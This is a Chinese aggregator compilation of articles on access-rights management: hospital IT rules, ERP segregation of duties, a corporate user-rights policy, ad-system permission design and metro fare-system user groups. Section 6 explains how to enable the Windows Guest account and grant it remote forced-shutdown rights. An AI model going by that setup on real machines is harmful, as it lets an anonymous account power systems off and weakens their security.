bss系统权限管理规范(精选11篇)
1.bss系统权限管理规范 篇一
沈阳经济技术开发区人民医院
信息系统操作权限分级管理规定
为了加强计算机及信息网络安全及保密管理,避免操作权限失控,并防止一些用户利用非法取得的权限进行不正确的活动,特制定网络操作权限分级管理规定,对各用户的上网活动进行严格的管理,并按照各用户的身份对用户的访问权限进行严格的控制,保证网络的的正常运转,确保应用程序安全、稳定的运行。
为实行信息系统操作权限分级管理,切实保障网络信息安全,对网络运行进行监控、防病毒、防入侵。我们有专门的权限设置模块,可以为操作人员按照功能点配置是否有进入功能点的权限。主要还是根据相关人员的角色来划分权限的,不同的操作人员有不同的角色,也方便管理。操作权限分级管理----打个比方收费处,财务科可查全部的退费记录,住院处退签好字的住院费用,门诊收费员只能查或退本人所有费用。各司其职,保障了网络信息安全。我院安装了远程监控软件,可远程维护和远程监控工作站,及时解决发现的问题。每台机器上安装了硬盘保护系统,同时安装了瑞星杀毒软件,安装了U盘锁软件,封住了外来移动盘,防止病毒的入侵,保证了网络的安全。我们每天中午和晚上两次备份数据库,同时备份到别的机器上一份,做到双保险。做到数据尽量少的丢失,保证数据的完整。为保护病人隐私。我院医务人员和有关医院管理人员调阅、复制、打印
电子病历时,医疗机构要设定相应权限,建立电子病历使用日志,记录使用人员、操作时间和内容。根据规定,除医院人员外,患者本人或其代理人、死亡患者近亲属或其代理人、为患者支付费用的基本医疗保障管理和经办机构、患者授权委托的保险机构可以申请调阅、复制电子病历,申请时需留存申请人有效身份证明复印件及其法定证明材料、保险合同等复印件。
第一条 所有服务器、主干交换机及其他系统主要设备由网络技术员负责管理,任何人不得擅自操作网络设备,修改网络参数和服务器的相关设置等。
第二条 信息中心非配给各科室的文档上传下载口令,各科室工作人员应予以保护,如因保护不善而造成的不良后果由各科室工作人员承担。
第三条 对于主要网络设备和计算机服务器系统,信息技术中心应当正确分配权限,并加严密的口令予以保护,口令应定期修改,任何非系统管理人员严禁使用、扫描或猜测口令。
第四条 对于服务器系统和各主要交换设备的配置信息,信息术中心应做好定期备份工作,确保在系统发生故障时能及时恢复,以保障网络的正常运行。
第五条 信息中心系统管理维护人员对于服务器系统和主要网络设备的设置、修改应当做好登记、备案工作。同时管理人员还要做好服务器系统和主要网络设备的审核的备份工作。
第六条 需要设立WEB服务器、FTP服务器等设施,必须由各应
用科室向信息中心提出申请,填写表格,由设立单位负责人签字同意,并经主管院领导审核批准后方可设立,同时应指定专人负责管理。上述站点都要接受信息中心的监督。
第七条 对于使用FTP服务器的用户,根据信息中心分配的上下传口令及时更新备份服务器的共享文件。
第八条 信息中心管理人员要明确管理职责,不得擅自将自己操作权限转交他人,避免操作权限失控。未经领导批准也不得超越权限操作。
第九条 信息监管人员负责分类如下:
总负责人:倪高洋
有负责整个信息网络、硬件设备、人员调动等的监督、管理、分配的权限。
硬件设备负责人:柏尔鑫
有负责打印机与计算机相关硬件的维修维护的权限。确保硬件设备使用顺畅。
软件设施负责人:田硕
有负责外网信息与内网信息管理系统安装、调试、维护、权限。确保软件设施使用流畅。
2.bss系统权限管理规范 篇二
ERP系统权限的管理、运维期间权限的变更, 以及角色权限互斥等, 都是企业ERP系统上线后面临的重要的安全保密工作, 符合企业利益的权限管理是保障ERP系统正常运行的首要条件。企业应遵循权限管理与设置规则, 使不相容岗位角色职责分离, 进行符合内控需求的权限测试, 使企业能够正常运行。
1 用户权限管理与设置规则
用户权限设置应遵循以下基本原则。
1.1 职责分离原则
对于同一组不相容权限, 任何用户不能同时具有两种或两种以上的权限。
1.2 未明确允许即禁止
除非用户有对于权限的需求得到了相关领导的明确批准, 否则不应当授予用户任何权限。
1.3 需求导向及最小授权原则
对于用户的权限, 应当以其实际工作需要为依据, 且仅应当授予其能够完成工作任务的最小权限。
2 用户权限管理的范围风险以及职责分离矩阵应用
2.1 访问权限
是指用户能够访问哪些资源或执行哪些任务 (或功能) 的范围, 从控制的角度考虑用户在系统中所拥有的权限是否超出了其工作需要。
2.2 职责分离
职责分离是把一个业务 (子) 流程的工作内容分为几个职责不相容的部分并由不同的人来完成, 避免因一个人拥有操作不相容业务的权限而产生舞弊风险。
2.3 用户权限分配不当引起的风险
(1) 用户如果在系统中具有不符合其实际业务职责的权限, 可能导致对业务、财务数据及相关信息不适当的非授权修改。
(2) 用户如果在系统中具有互斥权限, 那么该用户就具有了在系统中进行舞弊操作的可能。
2.4 职责分离矩阵应用
职责分离矩阵中定义了业务活动与事务代码之间的关系。事务代码与业务活动是从属关系, 如果某两个业务活动是互斥的, 那么它们包含的事务代码彼此间也是互斥的。
如图1所示, “创建采购订单”和“审批采购订单”是属于互斥的业务活动, 而创建采购订单需要执行事务代码ME21N或ME22N, 审批采购订单需要执行事务代码ME28或ME29N, 因此ME21N与ME28, ME21N与ME29N都是互斥的, 同样ME22N与ME28, ME22N与ME29N也是互斥的。因此在给用户分配权限时, 需根据业务活动的互斥关系, 来检查用户是否具有互斥事务代码的权限。
对于职责分离矩阵中与X的区别:
(1) ERP系统职责分离矩阵中加粗并标有下划线的代表具有重大风险的互斥业务活动, 公司在编制自己的职责分离矩阵时, 如果这些业务活动符合实际业务情况, 那么标有的业务活动之间必须是互斥的。
(2) 对于其他业务活动, 公司可以基于自身业务情况和对风险的考虑来决定是否互斥。公司应对风险进行充分的考虑, 并结合自身业务实际情况, 同时参照ERP系统职责分离矩阵模板建立适用于本单位的职责分离矩阵, 同时明确业务活动和事务代码的对应关系。
公司在编制职责分离矩阵时还需坚持一个原则:主数据维护、财务活动和和其他业务活动 (指采购、销售、库存等业务活动) 之间必须相互分离, 例如主数据维护人员不能同时具有财务或其他业务活动的权限, 财务人员不能同时具有维护主数据或其他业务活动的权限。
3 结论
综上所述, 加强ERP系统权限管理, 按照职责分离矩阵的要求, 进行权限分离, 从根本上杜绝了权限互斥, 取得了很好的应用效果。通过总体信息系统层面和ERP系统应用层面进一步细化相应的权限管理和上线后的权限测试, 有效地提升了ERP应用效果和企业后续运维管理水平。
参考文献
3.bss系统权限管理规范 篇三
关键词:ERP;权限管理;案例;途径
一、ERP权限管理的概念及其重要性
ERP权限管理的概念及内容。权限管理是ERP上线后系统运维管理的一个重要工作内容,包括用户管理、角色维护与授权、角色参数维护以及ERP内部控制工作等。系统上线后能安全、高效运行的前提是权限运维必须规范,即用户管理规范、授权管理清晰,最终用户的权限设置符合内控部制规范。否则,将产生直接负面影响,轻者业务员无法正常开展业务,重者会导致ERP管理混乱,业务停滞,信息数据泄密,给企业和公司带来损失。可以说,规范的系统权限管理和有力的管控是保证系统安全运行和数据保密的必要手段。因此,构建高效的权限管控体系和规范的授权业务流程是保证系统安全、高效和数据保密的重中之重。
二、ERP权限管理失控导致公司业务混乱,内控审查困难案例
以下两个案例来均自于某国有企业下属某地区公司。案例1. 2011年该地区公司业务人员发现系统中有一笔已建投资项目计划被更改,同时还存在一笔未知投资项目,引起了领导的高度重视和关注,经层层查找,最终发现以上操作是一个未及时关闭的ERP实施期间的大权限账号所操作,但已无法查找创建人。庆幸的是以上两个问题被及时发现和处理,否则将造成了该公司项目投资计划、预算分配混乱,给该公司带来严重的经济损失。案例2.公司在接受总部2012年内控检查时,权限测试结果中发现了互斥及敏感权限达到7万余条,涉及到的用户占总用户数的70%以上,账号权限互斥非常严重,业务和流程混乱。测试结果影响了当年该企业对其下属的地区公司的内控工作和生产业績考核,当年部分工作总额因此被扣除,导致了职工年终奖金下降。
三、原因分析
以上两个案例究其原因,都是由于ERP权限运维混乱、授权失控,管理不规范所造成的。案例1主要是因为ERP上线后,没有规范ERP权限管理,未能及时梳理系统账号,未及时系统实施账号和收回诸如投资项目计划创建之类的受控权限。案例2是由于公司未建立起规范的ERP运维体系,ERP权限管理和内控管理严重脱节,用户账号授权失去控制和监督,用户权限设置不符合职责分离原则所造成。
四、优化ERP系统权限管理,提升管控力的有效途径
(一)建立健全ERP权限管理规章制度。实际上,我们不可能完全通过技术手段来进行权限的维护, 还需要建立起相应的规章制度,理顺、理清权限申请和授权的工作流程,以此来规范和约束权限管理,做到管理有理、有据、流程化、规范化,减少用户和管理员在权限申请和授权过程中主观意识的负面作用,使授权工作过程可控、授权结果合规。
(二)建立清晰、有效的权限控制解决方案。ERP权限控制从事务代码级、组织机构级、权限对象字段值级等三个层次进行。(1)事务代码级控制是授予用户的权限角色中必须包含具有操作某项系统业务所对应事务代码,也就是为其分配的具体角色中须在用户菜单或事务代码中含有该事务代码;(2)组织机构级控制是指用户具有了事务代码的执行权限,还必须具有相应组织的操作权限才能完成业务。实施中需根据实际设计不同性质的组织架构,通过为角色分配不同的公司代码值,将用户的业务限制在不同的公司代码下;(3)权限对象字段值是指用户具有了某事务代码的执行权限和相应组织的操作权限之后,ERP 系统又对相应的操作根据权限对象进一步控制。
(三)建立起清晰的用户岗位职责体系。如何才能快速、高效地解决企业权限管理混乱的现状,就必须在系统中的用户账号和权限申请及权限分配按照“一人一岗”的原则进行。事实上,企业不断追求人力资源最小化,一人承担多个岗位工作是必然的,这种管理现实势必造成人员职责交叉,权限设置混乱就是必然结果。因此,如果没有清晰的岗位职责体系,就无法合理划分各个岗位的职责分工,无法保障用户在工作岗位职责划分合理、合规,符合内部控制规范。最终会出现两种结果,一是为了符合内控规定,系统中授予用户的业务处理权限无法满足用户需求,导致企业生产经营停滞和业务中断;二是为了能维持企业生产经营和业务流程正常进行,用户就会无约束的申请权限,而管理员也无约束的给用户授权,最终导致用户权限分配失控。所以在系统中建立起合理、清晰的岗位设置和职责体系对于解决ERP权限管理混乱的情况是非常重要的。
(四)强化“三部门”沟通协调,畅通用户信息反馈渠道 “三部门”是指ERP系统应用部分、权限运维支持部门。以及人事管理部门。实际上,岗位、职责、权限三者之间的关系是环环相扣的,人员岗位变动引起职责变化,职责变化就意味着权限需要调整,反过来,用户权限调整了就意味着他的岗位和职责发生了变化。这是因为ERP系统用户账号与用户实际岗位和职责绑定的,用户的岗位和业务职责决定了其账号在系统中应分配的角色和权限。但人事岗位调整和分工是由人事管理部门具体操作,业务部门只有建议权,没有处理权,所以在这种情况下,
ERP应用业务部门、人事管理部门和ERP运维支持部门需要建立起有效的沟通协调体系。人事部门和业务部门介入ERP系统的权限管理工作中,一方面人事部门可以及时协调处理人事岗位、职责调整的信息反馈,形成畅通的人事信息反馈机制,当有人员岗位和职责分工调整的情况时,人事管理部门可以及时将相关信息反馈到业务部门和权限管理部门,以便业务部门和权限管理部门能迅速作出反应,及时撤销应该撤销的用户ID,冻结该冻结的ID,变更该变更的业务权限,删除该删除的权限,保证系统运营风险最小化;另一方面人事部门与业务部门可以通过有效的沟通系统,不断梳理、调整、优化部门岗位设置和人员职分工,达到合理分配人力资源。
(五)定期开展ERP账号梳理。ERP用户账号管理是权限管理工作中最基础的工作,因为没有用户账号,根本就不用考虑该业务人员岗位职责是否互相冲突,业务处理权限是否互斥。所以要做好ERP权限管理工作,保证管理程序上清晰、规范,首先就要做好账号管理的规范,因此按照ERP内部控制规范,定期开展ERP账号梳理。这样做可以取得两个方面的好处,一是可以及时关闭和撤销不再需要的用户账号,降低用户账号的闲置率,有效提升账号利用率,减少企业因为存在大量闲置账号而承担不必要的运维费用;二是可以及时清理出存在权限互斥的账号,及时向业务部门反馈,并及时处理,将ERP内控管理要求落实在日常管理中,而不至于在开展内控检查工作前手忙脚乱、头痛以头、脚痛医脚的状况。
(六)内控工作部门全程参与ERP权限管理。内控管理部门在业务上具有业务指导和协助管理的工作职责。国内大多数实施了ERP的企业或公司后,权限运维管理面临一个怪现状,内控管理部门基本上根本未参与ERP权限管理工作,完全脱离ERP内控工作,根本不会关注运维部门具体的执行过程,重点只关注每年的内控审查结果。没有检查就不会关注执行部门是否把ERP内控工作执行的到底怎么样,给用户授权的过程是否可控,用户授权权限是否合规,角色分配是否符合职责分离原则等,往往在内控测试检查出问题后,再要求执行部门去整改。因此,内控管理部门参与到ERP权限管理工作中,做好权限内控测试,把好用户权限申请的第一关是必须的。
综上所述,在ERP系统用户权限设定上,就要充分考虑岗位设置的合理性,对岗位的职能,职责进行科学的区分,优化人力资源合理配置,才能真正做到合理分配用户操作权限和限制用户操作范围,从而保证系统的安全性,数据的完整性。
参考文献:
[1] 孙士学.苏瑞. SAP权限管理浅谈.电脑知识与技术,2011,7(11):2527-2537.
[2] 张震.张巍钟. ERP 系统权限管理.中国管理信息化,2012,15 (3):53-54.
4.公司信息化系统用户权限管理制度 篇四
网络资源管理制度
第一章 总 则
第一条 为了规范公司信息化系统的权限及电脑网络资源的管理工作,明确系统用户权限的管理职责,结合公司实际情况,特制定本制度。
第二条 本办法相关名词解释
信息化系统:是指公司支撑系统,人力资源系统、餐厅系统、会员管理系统、OA系统、等相关IT运行管理系统。
电脑及网络资源:是指公司所有属于信息系统类的相关设备,如:办公电脑、打印机、服务器、网络交换机等。
权限:是指在信息化系统中用户所能够执行的操作及访问的数据。
第三条 本制度的适用范围为公司部门、子公司。其相关的权限变更,或资产调拨按照集团公司申请流程提报。
第二章 管理职责与分工
第四条 信息化系统用户权限、办公电脑及网络资源的归口管理部门,主要负责各系统内用户权限、的命名、审批、上报、配置、监控、删除、通知和培训等管理工作。负责电脑及网络设备的统一调配、维护及管理。
第五条 各相关部门、子公司仅能在自己的授权范围内
进行系统的收集、申请、反馈、数据查询等业务操作;超出集团公司授权的数据查询申请要由第一责任人向集团公司提出申请。
第六条 各部门及子公司在集团公司固定资产管理要求下负责本单位内部电脑及网络设施设备的保管及维护工作。各部门及子公司不能在没有授权的情况下对相关设备进行搬动、拆解、调整及更换。
第三章 系统用户权限管理
第七条 用户权限的申请
集团全部信息系统采用一账通管理模式,并与人力资源系统衔接,对应人员入职岗位就享有与之岗位相匹配的管理、操作及查询权限。不得私自使用他人权限进行系统查询及操作。每级用户权限需要严格管理,并定期修改密码。用户要保护好自己的系统权限,发生密码泄漏事件,及时上系统进行密码更改。用户不得随意将自己的密码告诉他人,在特殊情况由于工作需要的,必须经集团公司申请同意后,备案后才可授权给他人使用。
第八条 用户权限的申请审批
如果需要超出自己的岗位权限的系统权限需向上级或集团公司申请,由公司调整增加。信息系统用户权限新增(变更)申请需有本部门或子公司第一责任人在公司OA系统中由申请,按照集团公司申请流程进行审批。
第九条 ERP系统授权原则
二线管理部门仅各部门第一责任人能查询集团整体销售、成本数据。其他岗位将不整体开放业务数据查询,仅根据工作需要开启某一方面业务数据的查询。
第四章 电脑及相关网络设备的管理
第十条 员工办公电脑的应用
员工办公电脑是公司根据岗位工作需要,分配给员工日常办公使用的电脑,属于公司资产,员工是办公电脑的使用,日常保管责任人,应爱护管理好办公电脑。
公司负责员工电脑的分配与调整,有权根据工作需要调整分配办公电脑,任何个人未经准许不得私自更换,调整,搬动电脑,严禁对电脑主机拆机,违反以上规定,视情况按公司奖惩制度执行,擅自拆机损坏电脑、拷贝集团公司数据者将给予辞退处理。
部门间电脑调整,应按照集团公司固定资产调拨管理固定执行。公司不允许员工私自把个人笔记本带到公司使用,如发现公司将提出警告出发。如果确实因移动办公需要的岗位,需填写申请单,经集团公司批准后方可使用。
员工电脑办公软件统一安装维护,分配管理。员工个人不得自行安装软件,如发现公司将提出警告处罚,如需增加安装的软件工具,需填写申请集团公司批复后由融达协助安
装。
如若员工离职,需由第一责任人通知融达公司,由公司管理员及第一责任人现场做好电脑设备及数据文件交接工作。若离职人员未交接好电脑及文件便办理了离职手续,由其所在部门直接领导承担相关责任。
第十一条 员工上网行为的管理
员工不得利用公司网络资源将公司机密的数据泄露或做出其他有损公司利益以及违反国家法律法规的行为,如有违反,将视情节轻重,按公司《奖惩管理制度》处罚或移交司法机关处理。
第十二条 员工应按公司管理要求正确使用办公电脑,严禁未经保管人同意私自使用他人电脑。
第五章 附 则
5.bss系统权限管理规范 篇五
在总结了广告系统设计中《互联网精准广告定向技术》之后,作者又继续深入研究了广告系统设计中的权限管理设计以及结构设计,并从广告端与网站端两方面,进行了详细的阐述,
广告系统的权限管理设计
广告系统设计中,除了广告定向技术的运用以及广告投放流程的设计外,最复杂的就是权限管理的设计。不同于其他行业,广告公司或者媒体公司日常业务比较复杂,从职能来讲,包括销售、客户服务、客户执行、创意设计、策略策划、媒介计划、媒介执行、合同管理、财务审核等。从职位来讲,又包括了上下级关系的管理与被管理的关系。另外,从销售人员的个人利益考虑,客户信息在销售人员之间应该是隔断的,但从公司利益考虑,客户信息又必须是可以在销售人员之间流动,可以分配给合适的销售人员。
因此,广告系统的权限设计是非常复杂,非常费脑筋的一件事情。如果稍有考虑不到,在广告系统交付使用后,就会是一场噩梦。下面谈一种简单但却能够适应多变需求的权限管理设计。
1、权限的分类
将广告系统的权限进行抽象归类,我们将权限分为资源权限和操作权限两种。资源权限指客户信息,即客户资源。操作权限即广告系统中的增删改(查看是不需要选择的基础功能)三个功能性操作的权限。
2、权限的分配
对于资源权限,也即客户资源,我们在每个客户层面上进行分配,资源权限分配的对象为系统中的销售账户(可以是销售人员,也可以是销售经理或销售总监),再通过上下级关系的管理做到小组资源或者部门资源的分配。对于操作权限管理,我们通过权限组的设计来完成,权限组里面包括了各个元素的增删改操作。
3、权限管理的实现
在系统中,权限通过账户、权限组和客户分配三个模块或者操作完成。系统创建的每一个账户都会和一个权限组进行关联,这样这个账户可以在系统中进行的操作就可以确定。同时在创建账户的时候,需要指定其上级(上级为某一个确定的账户,必选项),并且需要选择其下级权限组(非必选项),这样就确定了上下级的关系。然后在客户资源界面为每个客户分配一个销售账户。
通过以上的操作,我们就完成了系统的权限管理的设计。这种设计逻辑表现出来的特点是:
1、设置灵活。权限组并没有和职能部门挂钩,可以进行灵活创建及设计,这么说的原因是因为各个公司的职能设置不同,即使同一公司的同一部门,职责范围也会经常变化。
2、客户资源职能分配给一个账户,在同级别的账户中实现隔断,不能共享,确保了销售人员的利益。但客户资源可以随时重新分配,这样确保了公司的利益,可以使客户随时分配给合适的销售人员。另外,上级可以查看下级的客户资源,便于销售管理(请注意,最基础的权利只是查看。是否拥有修改权利,取决于上级所在权限组的权限设置)。
问题:
1、为什么上级是确定账户而下级是权限组?
2、在上级的指定设计中,会有一个天然的逻辑错误,这个逻辑错误是什么?
—————- 解答 —————-
1、在创建一个账户时,如同一个新人入职,其上级往往已经确定了,但其下级并不能确定,因此下级我们使用权限组来设定下级的操作权限。
2、上级的制定会形成循环指定。假设有a、b、c三个人,我们指定b是a的上级,c是b的上级,如果a是c的上级,则三人形成了循环指定。因此我们需要设定一个规则来避免这种情况的发生。
广告系统的结构设计——广告端
不同于其他系统,在广告系统中,重要的除了权限管理以外,还有一个需要注意的就是系统的结构设计,
从整个系统角度讲,合理的架构应该是:
代理商
广告主
活动
订单
广告
其中,广告主可以有代理商,也可以无代理商。但活动、订单、广告应该是严格的包含关系。
结构设计和权限设计构成了一个完整的广告系统:
解释:
1、代理商:指为广告主提供广告代理服务的公司。如实力、传力、奥美等我们经常提到的4A广告公司,还有华扬等local 4A广告公司等。在有些系统中,代理商也被叫做渠道。
2、广告主:指广告所宣传产品的生产商,也是实际支付广告费用的机构。广告主并不需要一定有代理公司,因此在系统中,广告主可以处在最高层级,这个时候我们称这个广告主为直客,即直接客户。因此在有些系统中,广告主被称为客户。
3、活动:活动的相关设定是根据我们现实中签署的合同来设置的。因此他是合同在系统中的体现,他主要包括投放周期、投放总额以及投放的媒体等相关信息。
4、订单:订单是活动的进一步细化,在活动设置的基础上加入了素材和投放策略。但订单还不是广告投放的最小单位,广告才是。
5、广告:广告是系统进行投放的最小单位,一个广告中包含一个素材以及素材对应的显示监测和点击监测。有时候我们在有些系统中并没有看到一个叫”广告 “的列表界面,但这并不意味着系统投放核心进行投放时候没有用广告概念。不管是那个系统,最小的投放单位一定是”一个素材及素材对应的显示监测和点击监测 “。
Google作为网络广告的典范,国内的广告公司或者业内同学一定会研究Google的相关系统,例如Google Adwords。Google Adwords结构设计和上述所列结构设计的对应关系如下(顺便列出了百度推广的对应关系):
Google AdwordsBaidu 推广上述结构
广告系列推广计划活动
广告组推广单元订单
广告创意广告
广告系统的结构设计——网站端
广告系统从根本上讲只是一个帮助广告主和网站主进行媒介资源买卖的平台,因此一个广告系统不可能是单一的只有广告主没有网站,或者只有网站主没有广告主。广告系统中网站主的结构设计和权限设计如下:
解释:
网站主结构设计在代理与网站主两层上和广告主的代理商与广告主两层一致,没有太大的区别。
频道在系统中是为规划广告位而设置的,对应于实际的频道,比如新闻频道、体育频道等。此处需要提前考虑首页和全站的广告位应该如何建立。
广告位是广告最终投放的实际位置。在广告位上,我们需要重点考虑广告位的类型和尺寸(影响所提取的代码)。如果是第三方免费提供给网站使用的系统,可能会设置“加入剩余流量/网盟计划”的选项,方便第三方公司收集和利用媒体的流量。
目前市场上的广告系统基本上分两个方向:面向广告主和面向网站主的,也就是系统命名中经常能看到的for advertising和for publisher。for advertising更倾向于提供多重定向设置为广告主服务。for publisher则倾向于通过简洁便捷的广告位管理为媒体提供服务。两类系统都符合以下的结构:
在系统中,最基础的投放单位为广告,系统中所有的投放数据也都以广告位最小单位进行展示。广告主端和网站主端共享广告的数据。
目前广告系统的发展有两个趋势:一是for advertising和for publisher的区别越来越小,最终会整合成一套系统;二是系统趋向于在线版,安装版越来越少。
关于广告系统的结构设计介绍完了,大家还有什么问题?欢迎您的交流!
6.如何给系统远程关机权限 篇六
首先在待控制的计算机系统中启用运行好Guest账号,同时为该账号设置好允许通过网络访问目标计算机的权限,具体的设置过程,本文在这里就不重复叙述了;
其次设置远程关机权限。在默认状态下,Windows系统禁止Guest账号通过网络来远程关闭自己,为此我们需要开通这个权限,才能保证日后网络管理员可以直接以Guest账号完成远程关机操作。在设置远程关机权限时,先打开待控制计算机系统的组策略控制台窗口,在该窗口的左侧显示区域中,依次点选“计算机设置”/“Windows设置”/“安全设置”/“本地策略”/“用户权限分配”分支选项,在目标分支选项下面找到“从远程系统强制关机”组策略项目,并用鼠标双击该项目,打开设置对话框;
单击该对话框中的“添加用户或组”按钮,打开用户选择对话框,从中选中Guest账号并单击“确定”按钮,这样一来Guest账号就有远程关闭系统的权限了,
最后进行远程关机操作。倘若我们现在要对内网中的其他待控制的计算机系统执行关机操作时,可以先打开自己的计算机系统,依次单击“开始”/“运行”命令,在弹出的系统运行对话框中输入“cmd”字符串命令,单击回车键后,将系统切换到MS-DOS命令行窗口,在该窗口的命令行提示符下执行字符串命令“shutdown /i”,打开远程关机对话框;
7.商业智能在BSS系统中应用 篇七
商业智能代表为提高通信企业运营性能而采用的一系列方法、技术和软件, 它能够从BSS系统中获取各类客户数据和业务数据, 由此建立多层次的分析体系, 并将其转化成有商业意义的信息。商业智能把先进的信息化技术应用到整个企业, 不仅为企业提供信息获取能力, 而且通过对信息的开发, 将其转变为企业的竞争优势。商业智能系统对于企业发现市场新机会、创造竞争新优势的作用是显而易见的。
二、商业智能体系框架
商业智能通常被理解为将通信公司中现有的数据转化为知识, 帮助公司做出明智的业务经营决策的工具。这里的数据包括来自BSS系统的订单、欠费、现金交易、佣金、客户和渠道资料, 以及公司内部和其他运营商的结算数据。而商业智能能够辅助的市场经营决策, 既可以是操作层的, 也可以是战术层和战略层的决策。为了将数据转化为知识, 需要利用数据仓库、联机分析处理工具和数据挖掘等技术。因此, 从技术层面上讲, 商业智能技术并不是基础技术或者产品技术, 它是数据仓库、OLAP和数据挖掘等相关技术走向商业应用后形成的一种应用技术。
商业智能系统主要包括数据预处理、建立数据仓库、数据分析及数据展现四个主要阶段。数据预处理是整合企业原始数据的一步, 它包括数据的提取、转换和装载三个过程。建立数据仓库则是处理海量数据的基础。数据分析是体现系统智能的关键, 一般采用联机分析处理和数据挖掘两大技术。
三、商业智能在BSS中应用
商业智能及数据仓库在BSS系统中应用主要有以下几个方面。 (1) 客户关系管理。CRM的目标是以更好服务留住客户, 提高通话质量和利用率, 扩大市场份额;刺激“零次户”用户, 激活对公司业务兴趣;放弃信用度差和欠费久的用户, 降低运营成本和风险。要实现这个目标必须尽可能收集用户的资料信息, 利用数据挖掘技巧, 对无序、复杂的信息挖掘出想要知识及规律, 尽可能了解用户的消费行为。通过对数据分析, 不但能挽留老客户, 而且能吸引新的客户, 同时还能针对不同的客户采取不同的策略达到个性化服务。 (2) 账务分析。账务分析主要是从财务的角度来看的, 对计费、财务、账务进行分析, 通过对财务账务的分析, 可以清晰掌握公司每天运营收入和支出情况;可以对投资与收益进行详细的分析。 (3) 整合企业信息。数据仓库系统具有很高扩展能力, 支持超大容量的数据存储能力, 高效的查询响应能力和并行处理能力, 适合于整合公司内部和外部系统的数据, 使公司对客户信息的认知度达到一致性, 提升企业运营数据的内在价值。 (4) 市场经营分析。市场经营分析的主要内容是面向与电信运营企业市场活动密切相关的市场活动及其业务产品相关情况的分析。通过对提供的产品和服务的使用情况进行统计、分析和预测, 通过综合分析, 根据不同的地区、不同时段的分布, 提供相应的业务品牌和服务。在营销管理分析方面, 数据仓库对各渠道的客户发展情况、收入情况、业务量发展情况等指标进行不同角度和层次的分析, 能够从不同的层面和角度对所有渠道进行全面考察, 为制定合理有效的宣传促销及推广提供决策依据。 (5) 欠费与防欺诈行为分析。欠费和防欺诈行为分析是指在总结各种骗取或套取结算费用、欠费行为的内在规律后, 在数据仓库中建立一套欺骗行为和欠费行为规则库, 该规则需要动态维护, 不断更新, 当用户的消费行为与该库中规则吻合或类似就发出告警。这种分析能及时预警各种欺骗、套取、欠费, 使企业损失尽量减少;同时通过用户缴费和消费情况, 分析用户的信用度也提供很大的便利。
四、结束语
商业智能系统正逐步成为通信企业管理中一把面向未来竞争的利剑, 推动着整个企业管理实现数字化、精细化、科学化。同时, 商业智能也是一个年轻而充满希望的研究领域, 商业利益的强大驱动力将会不停地促进它的发展, 每年都会有新的商业智能的理论和应用问世, 随着商业智能应用的不断深入, 企业还将面临着更多的问题和挑战, 等待我们去深入探索和研究。
参考文献
8.bss系统权限管理规范 篇八
自动售检票系统 (简称AFC系统) 是一种由计算机集中控制的自动售票 (包括半自动售票) 、自动检票以及自动收费和统计的封闭式自动化网络系统, 已在国内大中城市轨道交通运行中普遍应用。
2010年9月27日, 我国中西部地区第一条城市地铁———成都地铁1号线正式开通试运营, 笔者作为成都地铁AFC系统线路中央的系统管理员, 参与了1号线开通前后AFC系统各项技术讨论会、调试、运营演练、设备和系统升级, 现就AFC系统用户权限的管理作一经验交流。
1 AFC系统用户权限管理概述
城市轨道交通AFC系统是基于计算机、通信、网络、自动控制等技术, 实现轨道交通售票、检票、计费、收费、统计、清分、管理等全过程的自动化系统。国家标准《城市轨道交通AFC系统技术条件》将AFC系统进行了层次划分, 共分为车票、车站终端设备、车站计算机系统、线路中央计算机系统、清分系统5个层次。
为了鉴别用户身份以及加强系统安全, AFC系统管理员需要为每个使用AFC系统的人都分配一个独立的账号, 每个账号有不同的用户名和密码。用户账号被用来控制对系统的使用, 只有拥有特定权限的人才被允许使用相应的应用软件、终端设备, 从而实现AFC系统人员的分层次、规范化管理, 确保AFC系统中各级计算机设备安全、有序、稳定地运行。
2 用户权限管理业务分析
AFC系统用户权限管理涉及用户账号的申请、审批、建立、分发、启用、权限变更、停用、注销、密码重置、泄露处理等环节, 以下就几个重要环节作简要介绍。
2.1 对业务软件的要求
不同职责的人员对于系统操作的权限应该是不同的, 这对业务系统来说是最基本的功能。下面罗列了对业务软件的2点基本要求:
(1) 可以对“组”进行权限分配。如果要求系统管理员为其下员工逐一分配系统操作权限的话, 是件耗时且不够方便的事情。所以, 系统中就提出了对“组”进行操作的概念, 即将权限一致的人员编入同一组, 然后对该组进行权限分配。
(2) 权限管理系统应该是可扩展的, 以满足未来的应用需求。
2.2 对系统管理员的要求
对系统管理员有着比一般操作员更高的要求, 知识要更全面, 专业知识要更强, 对于系统管理员同时拥有更高的权限和责任。作为超级用户, 系统管理员的职责就是设置和维护系统, 所以其必须了解硬件和软件, 了解用户组的需求。
系统管理员对用户的责任主要有以下几点:
(1) 允许用户按其需要来使用系统;
(2) 评估用户的需求;
(3) 计划未来系统的增长和改变;
(4) 为用户提供帮助;
(5) 为系统的使用制定规章和程序。
2.3 设定用户权限组
成都地铁1号线AFC系统对用户账号的管理采用了“组”管理策略, 即将权限一致的人员编入同一组, 然后对该组进行权限分配。AFC系统的权限分为AFC终端设备操作权限、AFC应用软件操作权限、Web报表访问权限3大类。
根据应用用途的不同, 又可以将AFC系统用户账号分为3大类:
(1) 车站级用户权限 (用于BOM售票、车站监控、票务运作管理、系统设备维修维护等) ;
(2) 收益审核用户权限 (用于对账、票务管理、收益审计等) ;
(3) 线路中央管理用户权限 (用于参数管理、权限管理、运营管理等) 。
成都地铁运营有限公司站务车间、安全部、票务中心等相关部门通过多次会议讨论达成了共识, 明确了操作人员在AFC系统中各自的职责和操作权限。原则上只允许车站客运服务人员、AFC设备维修人员、票务稽查、票务中心相关员工申请AFC系统用户账号, 且申请人仅能申请与其工作处所相关的AFC系统用户权限。
接下来, AFC系统管理员根据讨论会会议纪要的精神, 对操作人员进行了用户角色分组, 并对各用户角色进行具体功能点权限的划分, 形成多个用户权限组。根据实际运营需要, 将车站客运服务人员分成了站务员、值班员、值班站长、中心站站长, 共4个权限组;将AFC设备维修人员分成了终端维护、AFC维修管理、监控调度、系统管理员, 共4个权限组;将票卡组人员分成了票卡组组员、初始化编码、票卡组组长、票卡管理, 共4个权限组;将收益审核组人员分成了收益审核员、收益审核组组长、收益管理、客流统计分析, 共4个权限组;此外还为票务稽查、经理级管理人员各设定了1个权限组, 合计18个权限组。
2.4 确定AFC正式账号的命名规则
